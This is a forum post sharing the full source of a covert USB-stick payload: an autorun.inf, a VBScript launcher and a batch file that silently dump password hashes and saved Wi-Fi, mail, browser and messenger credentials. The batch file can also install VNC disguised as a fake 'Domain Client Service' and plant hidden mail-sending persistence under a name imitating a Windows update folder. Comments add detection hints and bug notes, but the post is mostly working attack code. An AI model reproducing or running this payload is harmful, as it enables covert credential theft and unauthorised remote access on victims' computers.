Old 11-13-2007   #58 (permalink)
beakmyn
UPDATE: Using GonZor's approach (from the hak.5 forum) I've added my own pieces. The layout is:
Basically, in the Flash partition you have System\src\Include\0-20.dat — one empty marker file per payload module (see the list at the end of this post).

Based on which .dat marker files exist you can control what gets run — e.g. I don't have 2.dat or 3.dat (VNC and Haksaw), so those modules are skipped. This allows for a bit of customization without having to rebuild the .ISO. Two caveats: the whole chain depends on Windows AutoRun honoring the open= line on the emulated CD partition (later Windows versions restrict this), and everything harvested is written in plaintext to the Logs folder on the flash partition (along with the Haksaw mail credentials in HS.dat if that module is enabled), so a lost or seized stick gives all of it away.

FD = flash partition
U3 = CD partition

Code:
Files in the root of the CD (U3) partition:
Quote:
Originally Posted by autorun.inf
; autorun.inf on the read-only U3 CD-ROM partition. Windows AutoRun reads
; this section; instead of the stock U3 LaunchPad it starts the payload
; launcher (autorun.vbs) through the windowed Windows Script Host.
[AutoRun]
open=wscript autorun.vbs
; Icon is taken from the stock U3 launcher executable (LaunchU3.exe).
icon=LaunchU3.exe,0

; The two sections below are U3 LaunchPad-specific and are presumably
; carried over from the original autorun.inf; Windows AutoRun itself
; does not interpret them.
[Definitions]
Launchpad=LaunchPad.exe

[CopyFiles]
FileNumber=1
File1=LaunchPad.zip
Quote:
Originally Posted by autorun.vbs
' autorun.vbs - started by autorun.inf from the U3 CD-ROM partition
' (open=wscript autorun.vbs). It locates the two partitions of the stick
' by marker files and then hands off to go.bat on the CD partition.
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject("Wscript.Shell")
Set colDrives = objFSO.Drives
' Every error below is swallowed. If no drive matches, strfd / strU3 stay
' empty, the paths further down become relative and the Run calls fail
' silently - there is no feedback at all.
On Error Resume Next


' Timestamp (YYYYMMDD and HHMMSS) forwarded to go.bat for the log file name.
strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2)
strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2)

' Identify the partitions by marker file rather than by drive letter:
'   strfd = writable flash partition  (carries \System\SRC\drv.dat)
'   strU3 = read-only CD partition    (carries \System\SRC\go.bat)
' If more than one drive carries the same marker, the last one enumerated wins.
For Each objDrive in colDrives
'ignore floppy drives - reserved by BIOS if they don't exist
If UCase(objDrive.DriveLetter) <> "A" And UCase(objDrive.DriveLetter) <> "B" Then
If objFSO.FileExists(objDrive.DriveLetter & ":\System\SRC\drv.dat") Then
strfd = objDrive.Driveletter & ":"
End If
If objFSO.FileExists(objDrive.DriveLetter & ":\System\SRC\go.bat") Then
strU3 = objDrive.Driveletter & ":"
End If
End if
Next




' PL.dat on the flash partition is the master switch for the payload.
' go.bat is given "fd,U3,date,time"; cmd treats the commas as argument
' separators so they arrive as %1..%4. Window style 0 = hidden window,
' and the trailing False means do not wait for the batch file to finish.
If objFSO.FileExists(strfd & "\System\SRC\PL.dat") Then
objShell.Run strU3 & "\System\SRC\go.bat " & strfd & "," & strU3 & "," & strDate & "," & strTime, 0, False

End If

' U3.dat: additionally start the stock U3 launcher (presumably so the
' stick still behaves normally for the user). The relative path assumes
' the current directory is the root of the CD partition - confirm that
' AutoRun actually starts wscript there.
If objFSO.FileExists(strfd & "\System\SRC\U3.dat") Then
objShell.Run ".\LaunchU3.exe -a"

End If


Quote:
Originally Posted by U3\System\SRC\go.bat
:: go.bat - payload driver, started hidden by autorun.vbs as
::   go.bat <flash drive> <CD drive> <YYYYMMDD> <HHMMSS>
:: Each module below runs only if the matching N.dat marker file exists in
:: <flash>\System\SRC\Include. All output is appended to a per-host log on
:: the writable flash partition. Several modules need local admin rights
:: and will simply log an error otherwise.
:: Props: Setzer1411, Marc, rpk5000
:: fd = flash partition (writable)
:: U3 = cdrom partition (readonly)
@ECHO off



:: Fallback names so the log path and banner never contain empty values.
If %computername%.==. SET computername=computer
If %username%.==. SET username=None

:: Arguments 1 and 2 are the drive letters found by autorun.vbs.
SET fd=%1\System
SET U3=%2\System\SRC

:: Make the tools on the CD partition reachable as .\tool.exe.
:: NOTE: CD without /d only changes the directory on that drive; if the
:: script happens to start on another drive the .\ paths below will not
:: resolve (the fgdump module further down correctly uses CD /d).
CD %U3% >NUL

:: SET LOG PATHS
IF NOT EXIST %fd%\Logs\%computername% (
MD %fd%\Logs\%computername%
)

:: log and tmplog carry their own double quotes. include carries only an
:: opening quote; every IF EXIST line below closes it with a trailing
:: quote character. Fragile but intentional.
:: The spaces in "TE MP" here and in "Curr entVersion" / "stunnel.co nf"
:: further down look like forum line-wrap artifacts - presumably
:: _TEMP.log, CurrentVersion and stunnel.conf in the original file.
SET logdir=%fd%\Logs\%computername%
SET log="%fd%\Logs\%computername%\%computername%-[%3-%4].log"
SET tmplog="%fd%\Logs\%computername%\%computername%_TE MP.log"
SET include="%fd%\SRC\Include
:: The first line of EIP.dat / winaud.dat becomes the wget URL and the
:: WinAudit options. Both are passed unquoted, so whoever can write the
:: flash partition controls those two command lines.
SET /p eipurl=<"%1\System\SRC\Include\EIP.dat"
SET /p winaud=<"%1\System\SRC\Include\winaud.dat"
:: PAYLOAD
:: Log header. date and time here are locale dependent.
ECHO ----------------------------------------------------------------------------------------------------------------------------- > %log% 2>&1
ECHO GonZors mod by Beakmyn Payload [Time Started: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO Computer Name is: %computername% and the Logged on User Is: %username% >> %log% 2>&1

:: 0 - basic host recon with built-in commands only.
IF EXIST %include%\0.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [System info] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
IPCONFIG /all >> %log% 2>&1

Echo +-----------------------------------+ >> %log% 2>&1
Echo + Shares + >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
net share >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo + Users + >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
net user >> %log% 2>&1
)

:: 1 - external IP: fetches the URL from EIP.dat with wget into the temp
:: log and concatenates it onto the main log. This is the only module that
:: generates network traffic from the host. The wildcard after tmplog in the
:: COPY line is presumably a glob safeguard; the pattern repeats below.
IF EXIST %include%\1.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [External IP] +>> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO External IP dumped >> %log% 2>&1
.\wget.exe %eipurl% --output-document=%tmplog% 2>&1
ECHO. >> %tmplog% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

:: 2 - VNC server installed as a persistent, auto-start service. Needs admin.
:: The service is named WinVNC but displayed as "Domain Client Service" with a
:: description imitating a Microsoft domain component - a useful hunting
:: artefact: service WinVNC plus winvnc.exe sitting directly in the Windows
:: directory. vnc.reg is presumably the server configuration and password.
IF EXIST %include%\2.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [VNC] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO VNC was installed silently >> %log% 2>&1
XCOPY ".\vnc\*.*" "%systemroot%" /c /y
SC create WinVNC binpath= "%systemroot%\winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service" 2>&1
SC description WinVNC "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable." 2>&1
REGEDIT /s .\vnc.reg 2>&1
NET START WinVNC 2>&1
)

:: 3 - "Haksaw" persistence. Every line is "admin variant || non-admin
:: variant": files go to a hidden KB-lookalike folder under the Windows
:: directory, or to appdata\sbs when that fails. 2>&1 applies only to the
:: second command of each line. send.bat is the mail template plus HS.dat
:: (message, username, password); stunnel.conf comes from HS2.dat.
:: Persistence is the HKLM Run value "USBMedia" pointing at sbs.lnk, or a
:: shortcut named " .lnk" in the all-users Startup folder.
:: Caveat: if the Windows-dir folder already exists from an earlier run the
:: MD fails and that line alone falls back to appdata, so the two halves can
:: drift apart on reruns. Both folders get +s +h. SBS.lnk / SBS2.lnk on the
:: CD partition then start the copied components.
IF EXIST %include%\3.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [HakSaw] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO HakSaw was installed silently >> %log% 2>&1
MD "%systemroot%\$NtUninstallKB931337$" || MD "%appdata%\sbs" 2>&1
XCOPY .\HS\*.* "%systemroot%\$NtUninstallKB931337$\" /y || XCOPY .\HS\*.* "%appdata%\sbs" /y 2>&1
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.lnk" /f || "%appdata%\sbs\shortcut.exe" /f:"%allusersprofile%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico" 2>&1
COPY ".\send.bat"+%include%\HS.dat" "%systemroot%\$NtUninstallKB931337$\send.bat" || COPY ".\send.bat"+%include%\HS.dat" "%appdata%\sbs\send.bat" 2>&1
COPY %include%\HS2.dat" "%systemroot%\$NtUninstallKB931337$\stunnel.co nf" || COPY %include%\HS2.dat" "%appdata%\sbs\stunnel.conf" 2>&1
ATTRIB "%systemroot%\$NtUninstallKB931337$" +s +h & ATTRIB "%appdata%\sbs" +s +h 2>&1
.\SBS.lnk & .\SBS2.lnk
)

:: 4 - wireless keys via wifike.exe; /stext writes a text report which is
:: appended to the log (same temp-file pattern as module 1).
IF EXIST %include%\4.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump Wifi Hex] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\wifike.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog% %log% >> NUL
DEL /f /q %tmplog% >NUL
)

:: 5 - local SAM hashes via pwdump against 127.0.0.1. Needs admin.
IF EXIST %include%\5.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump SAM PWDUMP] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\pwdump 127.0.0.1 >> %log% 2>&1
)

:: 6 - SAM hashes via fgdump. fgdump writes 127.0.0.1.pwdump into the
:: current directory, hence the CD /d into the log folder first; the file is
:: appended to the log, removed, and the script returns to the CD partition.
IF EXIST %include%\6.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump SAM FGDUMP] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
CD /d %logdir% 2>&1
%U3%\fgdump.exe -c >> %log% 2>&1
ECHO. >> %log% 2>&1
ECHO -----Hashes----- >> %log% 2>&1
ECHO. >> %log% 2>&1
COPY %log%+%logdir%\127.0.0.1.pwdump %log% >> NUL
DEL /f /q %logdir%\127.0.0.1* >NUL
CD /d %U3%
)

:: 7 to 14 - stored-credential viewers. Each writes a text report into the
:: temp log with /stext and the report is appended to the main log.
IF EXIST %include%\7.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump Network PW] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\netpass.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\8.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump Mail PW] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\mailpv.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

:: 9 - FirePassword prints to stdout, so no temp file here.
IF EXIST %include%\9.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
Echo +----------------------------------+ >> %log% 2>&1
Echo + [Dump Firefox PW] + >> %log% 2>&1
Echo +----------------------------------+ >> %log% 2>&1
.\FirePassword.exe >> %log% 2>&1
)

IF EXIST %include%\10.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump IE PW] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\iepv.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\11.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump messenger PW] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\mspass.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

:: 12 - cached domain logon hashes via cachedump. Needs admin.
IF EXIST %include%\12.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump Cache] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\cachedump.exe >> %log% 2>&1
)

:: 13 - the banner says LSA secrets, but the tool invoked is pspv.exe,
:: whose name suggests a Protected Storage viewer rather than an LSA
:: secrets dumper - verify which it is before relying on the label.
IF EXIST %include%\13.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump LSA secrets] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\pspv.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

:: 14 - product keys. Note that tmplog already contains its own quotes, so
:: the extra quoting on this line yields a doubly quoted path.
IF EXIST %include%\14.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump Product Keys] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\produkey.exe /nosavereg /stext "%tmplog%" /remote %computername% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

:: 15 - URL history via the DUH.vbs helper on the CD partition.
IF EXIST %include%\15.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump URL History] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
CSCRIPT //nologo .\DUH.vbs >> %log% 2>&1
)

:: 16 - installed Windows updates list.
IF EXIST %include%\16.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump Updates-List] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\wul.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

:: 17 - listening sockets with owning executables; -b presumably needs admin.
IF EXIST %include%\17.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Network Services] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
netstat.exe -abn >> %log% 2>&1
)

:: 18 - local port enumeration with portqry, report written to the temp log.
IF EXIST %include%\18.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Port Scan] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\portqry -local -l %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
ECHO. >> %log% 2>&1
)


:: 19 - appends the current clipboard text to the log via nircmd.
IF EXIST %include%\19.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo + Clipboard + >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\nircmd.exe clipboard addfile %log%
)

:: 20 - WinAudit with the options read from winaud.dat; writes two report
:: files into the log folder rather than into the main log.
IF EXIST %include%\20.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo + Win Audit + >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
ECHO WinAudit saved to %logdir% >> %log% 2>&1
.\WinAudit.exe %winaud% /f=%logdir%\WA_%computername%[%3-%4] /f=%logdir%\WA_%computername%[%3-%4].txt >> %log% 2>&1
ECHO. >> %log% 2>&1
)

:: Log footer.
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO GonZors mod by Beakmyn Payload [Time Finished: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1

:End
EXIT
For getting the external IP: EIP.dat holds the URL that module 1 fetches with wget (its first line is read into eipurl). The URL itself did not survive in this post.

Quote:
Originally Posted by FD/system/src/include/EIP.dat
Quote:
Originally Posted by FD/system/src/include/winaud.dat
/r=oxutn /o=PDF /m=CA Security Scan
You'll need Parmavex's WinAudit on the CD partition if you want 20.dat to run.
Read its help file for the meaning of the /r switch (the /o and /m options above select PDF output and the report title).


Quote:
Originally Posted by FD\system\src\include\
0 - System Info , Shares, Users
1 - External IP
2 - VNC
3 - Haksaw
4 - WIFI Key
5 - SAM PWDUMP
6 - SAM FGDUMP
7 - Network Password
8 - Mail Password
9 - Firefox Password
10 - IE Password
11 - Messenger Password
12 - Cache
13 - LSA Secrets
14 - Product Keys
15 - IE URL History
16 - Windows Updates List
17 - Network Services
18 - Open Port Scan
19 - Clipboard
20 - Win Audit
EIP - External IP check URL (first line only; passed unquoted to wget)
winaud - WinAudit command line options (first line only)
HS2 - Mail server / stunnel configuration for Haksaw (copied as stunnel.conf)
HS - Mail message, username and password for Haksaw (appended to send.bat, so these credentials sit in plaintext on the stick and on every host the module was run on)